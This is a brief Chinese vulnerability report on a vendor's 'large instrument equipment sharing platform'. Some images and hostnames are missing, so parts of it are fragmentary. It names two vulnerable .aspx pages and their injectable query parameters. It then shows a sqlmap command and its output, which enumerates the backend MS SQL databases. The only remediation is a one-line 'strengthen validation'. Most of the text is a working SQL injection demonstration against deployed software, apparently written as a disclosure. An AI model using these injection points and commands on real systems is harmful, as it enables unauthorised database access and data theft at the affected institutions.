出问题的是该厂商开发的 “大型仪器设备共享平台系统”

介绍:
 

1.jpg





部分案例:



:81/











这次2个漏洞文件分别是:



/model/TwoGradePage/newsdetail.aspx



/model/TwoGradePage/NewsEquipment.aspx





漏洞利用演示:



?id=133&columnId=99



?OpenID=82&id=11316





sqlmap.py -u "?id=133&columnId=99"

--dbsavailable databases [6]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] tempdb


 

1.jpg

  修复方案:


加强验证